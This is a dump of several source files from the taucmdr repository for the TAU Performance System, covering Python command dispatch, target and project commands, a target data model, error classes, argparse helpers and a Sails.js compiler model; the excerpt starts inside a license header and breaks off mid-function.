IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\nfrom pkgutil import walk_packages\n\n# TAU modules\nimport logger\nimport error\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass UnknownCommandError(error.ConfigurationError):\n \"\"\"\n Indicates that a specified command is unknown\n \"\"\"\n \n message_fmt = \"\"\"\n%(value)r is not a valid TAU command.\n\n%(hint)s\"\"\"\n \n def __init__(self, value, hint=\"Try 'tau --help'.\"):\n super(UnknownCommandError, self).__init__(value, hint)\n\n\nclass AmbiguousCommandError(error.ConfigurationError):\n \"\"\"\n Indicates that a specified partial command is ambiguous\n \"\"\"\n message_fmt = \"\"\"\nCommand %(value)r is ambiguous: %(matches)r\n\n%(hint)s\"\"\"\n def __init__(self, value, matches, hint=\"Try 'tau --help'.\"):\n super(AmbiguousCommandError, self).__init__('Command %s is ambiguous: %s' % (value, matches), hint)\n\n\n_commands = {__name__: {}}\ndef getCommands(root=__name__):\n \"\"\"\n Returns commands at the specified level\n \"\"\"\n def _lookup(c, d):\n if len(c) == 1: return d[c[0]]\n else: return _lookup(c[1:], d[c[0]])\n\n def _walking_import(module, c, d):\n car, cdr = c[0], c[1:]\n if cdr:\n _walking_import(module, cdr, d[car])\n elif not car in d:\n d[car] = {}\n __import__(module)\n d[car]['__module__'] = sys.modules[module]\n\n command_module = sys.modules[__name__]\n for _, module, _ in walk_packages(command_module.__path__, command_module.__name__+'.'):\n try:\n _lookup(module.split('.'), _commands)\n except KeyError:\n _walking_import(module, module.split('.'), _commands)\n\n return _lookup(root.split('.'), _commands)\n\n\ndef getCommandsHelp(root=__name__):\n \"\"\"\n Builds listing of command names with short description\n \"\"\"\n groups = {}\n commands = sorted([i for i in getCommands(root).iteritems() if i[0] != '__module__'])\n for cmd, topcmd in commands:\n module = topcmd['__module__']\n descr = getattr(module, 'SHORT_DESCRIPTION', \"FIXME: No description\")\n group = getattr(module, 'GROUP', None)\n name = '{:<12}'.format(cmd)\n groups.setdefault(group, []).append(' %s %s' % (name, descr))\n \n parts = []\n for group, members in groups.iteritems():\n if group:\n parts.append(group+' subcommands:')\n else:\n parts.append('subcommands:')\n parts.extend(members)\n parts.append('')\n return '\\n'.join(parts)\n\n\ndef executeCommand(cmd, cmd_args=[]):\n \"\"\"\n Import the command module and run its main routine\n \"\"\"\n def _resolve(c, d):\n if not c: \n return []\n car, cdr = c[0], c[1:]\n try:\n matches = [(car, d[car])]\n except KeyError:\n matches = [i for i in d.iteritems() if i[0].startswith(car)]\n if len(matches) == 1:\n return [matches[0][0]] + _resolve(cdr, matches[0][1])\n elif len(matches) == 0:\n raise UnknownCommandError(' '.join(cmd))\n elif len(matches) > 1:\n raise AmbiguousCommandError(' '.join(cmd), [m[0] for m in matches])\n\n while len(cmd):\n root = '.'.join([__name__] + cmd)\n try:\n main = getCommands(root)['__module__'].main\n except KeyError:\n LOGGER.debug('%r not 
recognized as a TAU command' % cmd)\n try:\n resolved = _resolve(cmd, _commands[__name__])\n except UnknownCommandError:\n if len(cmd) <= 1: \n raise # We finally give up\n parent = cmd[:-1]\n LOGGER.debug('Getting help from parent command %r' % parent)\n return executeCommand(parent, ['--help'])\n else:\n LOGGER.debug('Resolved ambiguous command %r to %r' % (cmd, resolved))\n return executeCommand(resolved, cmd_args)\n except AttributeError:\n raise error.InternalError(\"'main(argv)' undefined in command %r\" % cmd)\n else:\n return main(cmd_args)\n" }, { "alpha_fraction": 0.6881172060966492, "alphanum_fraction": 0.6913029551506042, "avg_line_length": 30.389999389648438, "blob_id": "3a12063d84bc0d805adcdaadc13723fcfdc2e270", "content_id": "b6d5302d9231b9982ce34a70d78586e535bb2054", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3139, "license_type": "permissive", "max_line_length": 97, "num_lines": 100, "path": "/packages/tau/commands/target/edit.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport arguments as args\nfrom model.target import Target\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Modify an existing target configuration.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <target_name> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Target,\n use_defaults=False,\n prog=COMMAND, \n usage=USAGE,\n description=SHORT_DESCRIPTION)\nPARSER.add_argument('--rename',\n help=\"Rename the target configuration\",\n metavar='<new_name>', dest='new_name',\n default=args.SUPPRESS)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n\n name = args.name\n if not Target.exists({'name': name}):\n PARSER.error(\"'%s' is not an target name. Type `tau target list` to see valid names.\" % name)\n\n updates = args.__dict__\n try:\n new_name = args.new_name\n except AttributeError:\n pass\n else:\n updates['name'] = new_name\n del updates['new_name']\n \n Target.update(updates, {'name': name})\n \n return commands.executeCommand(['target', 'list'], [args.name])\n" }, { "alpha_fraction": 0.644960880279541, "alphanum_fraction": 0.6472618579864502, "avg_line_length": 32.17557144165039, "blob_id": "51cd5592df1d26b35345ba5cb7ab9edb090d7266", "content_id": "8f14269683ecae73989e8e4370575df8dc5c4812", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4346, "license_type": "permissive", "max_line_length": 91, "num_lines": 131, "path": "/packages/tau/commands/project/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport arguments as args\nimport environment as env\nfrom model.project import Project\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List project configurations or show configuration details.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [project_name] [project_name] ... [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('names',), {'help': \"If given, show details for this project\",\n 'metavar': 'project_name', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the project\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n names = args.names\n except AttributeError:\n found = Project.all()\n else:\n found = []\n for name in names:\n t = Project.withName(name)\n if t:\n found.append(t)\n else:\n PARSER.error(\"No project configuration named '%s'\" % name)\n\n title = '{:=<{}}'.format('== Projects (%s) ==' % env.USER_PREFIX, \n logger.LINE_WIDTH)\n if not found:\n listing = \"No projects. 
See 'tau project create --help'\"\n else:\n table = Texttable(logger.LINE_WIDTH)\n headers = ['Name', 'Targets', 'Applications', 'Measurements', 'Home']\n rows = [headers]\n if args.long:\n parts = []\n for p in found:\n populated = p.populate()\n parts.append(pformat(populated))\n listing = '\\n'.join(parts)\n else:\n for p in found:\n populated = p.populate()\n targets = '\\n'.join([t['name'] for t in populated['targets']]) or ''\n applications = '\\n'.join([t['name'] for t in populated['applications']]) or ''\n measurements = '\\n'.join([t['name'] for t in populated['measurements']]) or ''\n row = [populated['name'], targets, applications, measurements, populated['prefix']]\n rows.append(row)\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([title, '', listing, '']))\n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.5393794775009155, "alphanum_fraction": 0.5417661070823669, "avg_line_length": 15.411765098571777, "blob_id": "6844396951e401ad5885918cf0d17a4a94714518", "content_id": "d6f5f95361d55c9eb7884123f756544929645891", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 838, "license_type": "permissive", "max_line_length": 108, "num_lines": 51, "path": "/commander/api/models/Compiler.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Compiler.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n target: {\n model: 'Target', \n required: true \n },\n\n // Compiler language\n language: {\n type: 'string',\n required: true\n },\n\n // Compiler family name, e.g. 'intel'\n family_name: {\n type: 'string',\n required: true\n },\n\n // Compiler version\n version: {\n type: 'string',\n required: true\n },\n\n // Compiler command\n command: {\n type: 'string',\n required: true\n },\n\n // MD5 sum of compiler exe\n command_md5: {\n type: 'string',\n required: true\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.5628882050514221, "alphanum_fraction": 0.5642856955528259, "avg_line_length": 29.66666603088379, "blob_id": "0b258e733bda9f268488a4aa0bc4b4a1c4995e06", "content_id": "83fe18dab67911bbf0a6c17c1172cddafe5b39c1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6440, "license_type": "permissive", "max_line_length": 95, "num_lines": 210, "path": "/packages/tau/model/target.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport string\nimport platform\nimport subprocess\n\n# TAU modules\nimport logger\nimport controller as ctl\nimport arguments as args\n\n\nLOGGER = logger.getLogger(__name__)\n\n\ndef defaultHostOS():\n \"\"\"\n Detect the default host operating system\n \"\"\"\n return platform.system()\n\ndef defaultHostArch():\n \"\"\"\n Use TAU's archfind script to detect the host target architecture\n \"\"\"\n here = os.path.dirname(os.path.realpath(__file__))\n cmd = os.path.join(os.path.dirname(here), 'util', 'archfind', 'archfind')\n return subprocess.check_output(cmd).strip()\n\ndef defaultDeviceArch():\n \"\"\"\n Detect coprocessors\n \"\"\"\n # TODO\n return None\n\ndef defaultCC():\n \"\"\"\n Detect target's default C compiler\n \"\"\"\n # TODO\n return 'gcc'\n\ndef defaultCXX():\n \"\"\"\n Detect target's default C compiler\n \"\"\"\n # TODO\n return 'g++'\n\ndef defaultFC():\n \"\"\"\n Detect target's default C compiler\n \"\"\"\n # TODO\n return 'gfortran'\n\n\nclass Target(ctl.Controller, ctl.ByName):\n \"\"\"\n Target data model controller\n \"\"\"\n \n attributes = {\n 'projects': {\n 'collection': 'Project',\n 'via': 'targets'\n },\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'Target configuration name',\n 'metavar': '<target_name>'}\n },\n 'host_os': {\n 'type': 'string',\n 'required': True,\n 'defaultsTo': defaultHostOS(),\n 'argparse': {'flags': ('--host-os',),\n 'group': 'target system',\n 'help': 'Host operating system',\n 'metavar': 'os'}\n },\n 'host_arch': {\n 'type': 'string',\n 'required': True,\n 'defaultsTo': defaultHostArch(),\n 'argparse': {'flags': ('--host-arch',),\n 'group': 'target system',\n 'help': 'Host architecture',\n 'metavar': 'arch'}\n },\n 'device_arch': {\n 'type': 'string',\n 'defaultsTo': defaultDeviceArch(),\n 'argparse': {'flags': ('--device-arch',),\n 'group': 'target system',\n 'help': 'Coprocessor architecture',\n 'metavar': 'arch'}\n },\n 'CC': {\n 'model': 'Compiler',\n 'required': True,\n 'defaultsTo': defaultCC(),\n 'argparse': {'flags': ('--cc',),\n 'group': 'compiler',\n 'help': 'C Compiler',\n 'metavar': '<command>'}\n },\n 'CXX': {\n 'model': 'Compiler',\n 'required': True,\n 'defaultsTo': defaultCXX(),\n 'argparse': {'flags': ('--cxx','--c++'),\n 'group': 'compiler',\n 'help': 'C++ Compiler',\n 'metavar': '<command>'}\n },\n 'FC': {\n 'model': 'Compiler',\n 'required': True,\n 'defaultsTo': defaultFC(),\n 'argparse': {'flags': ('--fc','--fortran'),\n 'group': 'compiler',\n 'help': 'Fortran Compiler',\n 'metavar': '<command>'}\n },\n 'cuda': {\n 'type': 'string',\n 
'argparse': {'flags': ('--with-cuda',),\n 'group': 'software package',\n 'help': 'Path to NVIDIA CUDA installation',\n 'metavar': '<path>'}\n },\n 'tau_source': {\n 'type': 'string',\n 'defaultsTo': 'download',\n 'argparse': {'flags': ('--with-tau',),\n 'group': 'software package',\n 'help': 'URL or path to a TAU installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n },\n 'pdt_source': {\n 'type': 'string',\n 'defaultsTo': 'download',\n 'argparse': {'flags': ('--with-pdt',),\n 'group': 'software package',\n 'help': 'URL or path to a PDT installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n },\n 'bfd_source': {\n 'type': 'string',\n 'defaultsTo': 'download',\n 'argparse': {'flags': ('--with-bfd',),\n 'group': 'software package',\n 'help': 'URL or path to a BFD installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n },\n 'libunwind_source': {\n 'type': 'string',\n 'argparse': {'flags': ('--with-libunwind',),\n 'group': 'software package',\n 'help': 'URL or path to a libunwind installation or archive file',\n 'metavar': '(<path>|<url>|\"download\")'}\n }\n }\n \n _valid_name = set(string.digits + string.letters + '-_.')\n \n def onCreate(self):\n if set(self['name']) > Target._valid_name:\n raise ctl.ModelError('%r is not a valid target name.' % self['name'],\n 'Use only letters, numbers, dot (.), dash (-), and underscore (_).')\n" }, { "alpha_fraction": 0.6680698990821838, "alphanum_fraction": 0.6703851819038391, "avg_line_length": 28.15337371826172, "blob_id": "a486d0105a0ecc493fe12f01042f4dcb86e99b18", "content_id": "bbed7e49200b39255acba6fec43d575e8dde76e8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4751, "license_type": "permissive", "max_line_length": 105, "num_lines": 163, "path": "/packages/tau/error.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\nimport traceback\n\n# TAU modules\nimport tau\nimport logger\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass Error(Exception):\n \"\"\"\n Base class for errors in Tau\n \"\"\"\n \n show_backtrace = False\n \n message_fmt = \"\"\"\nAn unexpected %(typename)s exception was raised:\n\n%(value)s\n\n%(backtrace)s\n\nPlease e-mail '%(logfile)s' to %(contact)s for assistance.\n\"\"\"\n \n def __init__(self, value, hint=\"Contact %s\" % tau.HELP_CONTACT):\n self.value = value\n self.hint = hint\n \n def __str__(self):\n return self.value\n \n def handle(self, etype, e, tb):\n if self.show_backtrace:\n backtrace = ''.join(traceback.format_exception(etype, e, tb))\n else:\n backtrace = ''\n message = self.message_fmt % {'value': self.value,\n 'hint': 'Hint: %s' % self.hint,\n 'typename': etype.__name__, \n 'cmd': ' '.join([arg for arg in sys.argv[1:]]), \n 'contact': tau.HELP_CONTACT,\n 'logfile': logger.LOG_FILE,\n 'backtrace': backtrace}\n LOGGER.critical(message)\n sys.exit(tau.EXIT_FAILURE)\n\n\nclass InternalError(Error):\n \"\"\"\n Indicates that an internal error has occurred\n These are bad and really shouldn't happen\n \"\"\"\n show_backtrace = True\n \n def __init__(self, value):\n super(InternalError, self).__init__(value)\n\n\nclass ConfigurationError(Error):\n \"\"\"\n Indicates that Tau cannot succeed with the given parameters\n \"\"\"\n \n message_fmt = \"\"\"\n%(value)s\n%(hint)s\n\nTAU cannot proceed with the given inputs. \nPlease check the selected configuration for errors or contact %(contact)s for assistance.\n\"\"\"\n \n def __init__(self, value, hint=\"Try `tau --help`\"):\n super(ConfigurationError, self).__init__(value, hint)\n\n\nclass SoftwarePackageError(Error):\n \"\"\"\n Indicates there was an error in an external software package \n \"\"\"\n \n message_fmt = \"\"\"\n%(value)s\n%(hint)s\n\nPlease check the selected configuration for errors or email '%(logfile)s' to %(contact)s for assistance.\n\"\"\"\n\n def __init__(self, value, hint=\"Try `tau --help`\"):\n super(SoftwarePackageError, self).__init__(value, hint)\n\n\ndef excepthook(etype, e, tb):\n \"\"\"\n Exception handler for any uncaught exception (except SystemExit).\n \"\"\"\n if etype == KeyboardInterrupt:\n LOGGER.info('Received keyboard interrupt. 
Exiting.')\n sys.exit(tau.EXIT_WARNING)\n else:\n try:\n sys.exit(e.handle(etype, e, tb))\n except AttributeError, err:\n LOGGER.critical(\"\"\"\nAn unexpected %(typename)s exception was raised:\n\n%(value)s\n\n%(backtrace)s\n\nThis is a bug in TAU.\nPlease email '%(logfile)s' to %(contact)s for assistance\n\"\"\" % {'value': e,\n 'typename': etype.__name__, \n 'cmd': ' '.join([arg for arg in sys.argv[1:]]), \n 'contact': tau.HELP_CONTACT,\n 'logfile': logger.LOG_FILE,\n 'backtrace': ''.join(traceback.format_exception(etype, e, tb))})\n sys.exit(tau.EXIT_FAILURE)\n\n# Set the default exception handler\nsys.excepthook = excepthook" }, { "alpha_fraction": 0.6610939502716064, "alphanum_fraction": 0.6636379957199097, "avg_line_length": 33.8291130065918, "blob_id": "10c9f8895a6ef86dc125279765e298a9f6b218de", "content_id": "853fe107de93aaa589f24b9bc62b5765d54d95e5", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5503, "license_type": "permissive", "max_line_length": 96, "num_lines": 158, "path": "/packages/tau/arguments.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport argparse\n\n# TAU modules\nimport logger\n\n\nSUPPRESS = argparse.SUPPRESS\nREMAINDER = argparse.REMAINDER\n\n\nclass MutableGroupArgumentParser(argparse.ArgumentParser):\n \"\"\"\n Argument parser that permits groups to be updated\n \"\"\"\n def getGroup(self, title):\n for group in self._action_groups:\n if group.title == title:\n return group\n return None\n\nclass ArgparseHelpFormatter(argparse.RawDescriptionHelpFormatter):\n \"\"\"\n Custom formatter for argparse\n \"\"\"\n def __init__(self, prog, indent_increment=2, max_help_position=30, width=logger.LINE_WIDTH):\n super(ArgparseHelpFormatter,self).__init__(prog, indent_increment, max_help_position, width)\n\n def _split_lines(self, text, width):\n parts = []\n for line in text.splitlines():\n parts.extend(argparse.HelpFormatter._split_lines(self, line, width))\n return parts\n\n def _get_help_string(self, action):\n indent = ' '*self._indent_increment\n help = action.help\n choices = getattr(action, 'choices', None)\n if choices:\n help += '\\n%s- %s: (%s)' % (indent, action.metavar, ', '.join(choices))\n if '%(default)' not in action.help:\n if action.default is not argparse.SUPPRESS:\n defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE]\n if action.option_strings or action.nargs in defaulting_nargs:\n help += '\\n%s' % indent + '- default: %(default)s'\n return help\n \n\nclass ParseBooleanAction(argparse.Action):\n \"\"\"\n Parses an option value into a boolean\n \"\"\"\n def __call__(self, parser, namespace, value, option_string=None):\n if isinstance(value, bool):\n bool_value = value\n elif value.lower() in ['1', 't', 'y', 'true', 'yes', 'on']:\n bool_value = True\n elif value.lower() in ['0', 'f', 'n', 'false', 'no', 'off']:\n bool_value = False\n else:\n raise argparse.ArgumentError(self, 'Boolean value required')\n setattr(namespace, self.dest, bool_value)\n \n\ndef getParser(arguments, prog=None, usage=None, description=None, epilog=None):\n \"\"\"\n Builds and argparse.ArgumentParser from the given arguments\n \"\"\"\n parser = argparse.ArgumentParser(prog=prog, \n usage=usage, \n description=description,\n epilog=epilog,\n formatter_class=ArgparseHelpFormatter)\n for arg in arguments:\n flags, options = arg\n parser.add_argument(*flags, **options)\n return parser\n\n\ndef getParserFromModel(model, use_defaults=True,\n prog=None, usage=None, description=None, epilog=None):\n \"\"\"\n Builds an argparse.ArgumentParser from a model's attributes\n \"\"\"\n parser = MutableGroupArgumentParser(prog=prog, \n usage=usage, \n description=description,\n epilog=epilog,\n formatter_class=ArgparseHelpFormatter)\n groups = {}\n for attr, props in model.attributes.iteritems():\n try:\n options = dict(props['argparse'])\n except KeyError:\n continue\n try:\n default = props['defaultsTo']\n except KeyError:\n options['default'] = 